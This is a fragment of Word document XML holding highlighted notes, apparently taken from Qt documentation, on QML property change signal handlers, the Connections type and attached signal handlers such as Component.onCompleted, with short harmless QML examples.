      <w:bookmarkStart w:id="2415" w:name="_Toc483604390"/>
      <w:bookmarkStart w:id="2416" w:name="_Toc483605610"/>
      <w:bookmarkEnd w:id="2412"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Change Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2413"/>
      <w:bookmarkEnd w:id="2414"/>
      <w:bookmarkEnd w:id="2415"/>
      <w:bookmarkEnd w:id="2416"/>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 xml:space="preserve">A signal is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>automatically emitted when the value of a QML property changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This type of signal is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property change signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and signal handlers for these signals are written in the form</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Property&gt;Changed</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Property&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the property, with the first letter capitalized.</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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2689" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type has a </w:t>
      </w:r>
      <w:hyperlink r:id="rId2690" w:anchor="pressed-prop" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>pressed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> property. To receive a notification whenever this property changes, write a signal handler named onPressedChanged:</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import QtQuick 2.0</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Rectangle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id: rect</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width: 100; height: 100</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MouseArea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anchors.fill: parent</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onPressedChanged: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console.log("Mouse area is pressed?", pressed)</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Even though the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2691" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> documentation does not document a signal handler named onPressedChanged, the signal is implicitly provided by the fact that the pressed property exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00490E7E" w:rsidRDefault="00D77D11" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2417" w:name="using-the-connections-type"/>
      <w:bookmarkStart w:id="2418" w:name="_Toc483001056"/>
      <w:bookmarkStart w:id="2419" w:name="_Toc483004045"/>
      <w:bookmarkStart w:id="2420" w:name="_Toc483604391"/>
      <w:bookmarkStart w:id="2421" w:name="_Toc483605611"/>
      <w:bookmarkEnd w:id="2417"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using the Connections Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2418"/>
      <w:bookmarkEnd w:id="2419"/>
      <w:bookmarkEnd w:id="2420"/>
      <w:bookmarkEnd w:id="2421"/>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 xml:space="preserve">In some cases it may be </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>desirable to access a signal outside of the object that emits it</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For these purposes, the QtQuick module provides the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2692" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connecting to signals of arbitrary objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A </w:t>
      </w:r>
      <w:hyperlink r:id="rId2693" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> object can </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>receive any signal from its specified </w:t>
      </w:r>
      <w:hyperlink r:id="rId2694" w:anchor="target-prop" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the onClicked handler in the earlier example could have been received by the root </w:t>
      </w:r>
      <w:hyperlink r:id="rId2695" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> instead, by placing the onClicked handler in a </w:t>
      </w:r>
      <w:hyperlink r:id="rId2696" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> object that has its </w:t>
      </w:r>
      <w:hyperlink r:id="rId2697" w:anchor="target-prop" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> set to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2698" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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import QtQuick 2.0</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Rectangle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id: rect</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width: 100; height: 100</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MouseArea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id: mouseArea</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anchors.fill: parent</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Connections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target: mouseArea</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onClicked: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rect.color = Qt.rgba(Math.random(), Math.random(), Math.random(), 1);</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00490E7E" w:rsidRDefault="00D77D11" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2422" w:name="attached-signal-handlers"/>
      <w:bookmarkStart w:id="2423" w:name="_Toc483001057"/>
      <w:bookmarkStart w:id="2424" w:name="_Toc483004046"/>
      <w:bookmarkStart w:id="2425" w:name="_Toc483604392"/>
      <w:bookmarkStart w:id="2426" w:name="_Toc483605612"/>
      <w:bookmarkEnd w:id="2422"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attached Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2423"/>
      <w:bookmarkEnd w:id="2424"/>
      <w:bookmarkEnd w:id="2425"/>
      <w:bookmarkEnd w:id="2426"/>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An </w:t>
      </w:r>
      <w:hyperlink r:id="rId2699" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached signal handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is a sig</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nal handler that receives a signal from an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> rather than the object within which the handler is declared.</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For example, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2700" w:anchor="completed-signal" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component.onCompleted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an attached signal handler. This handler is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>often used to execute some JavaScript code when its creation process has been completed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as in the example below:</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import QtQuick 2.0</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Rectangle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width: 200; height: 200</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color: Qt.rgba(Qt.random(), Qt.random(), Qt.random(), 1)</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Component.onCompleted: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00D77D11"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console.log("The rectangle's color is", color)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00C10CB8" w:rsidRDefault="00D77D11" w:rsidP="00D77D11">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00C10CB8" w:rsidRDefault="00D77D11" w:rsidP="00D77D11">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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The onCompleted handler is not responding to some completed signal from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2701" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type. Instead, an object of the Component </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> with a completed signal has automatically been </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2702" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> object by the QML engine, and the engine emits this signal when the object is fully created, thus triggering the Component.onCompleted signal handler.</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 xml:space="preserve">Attached signal handlers </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow objects to be notified of particular signals that are significant to each individual object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
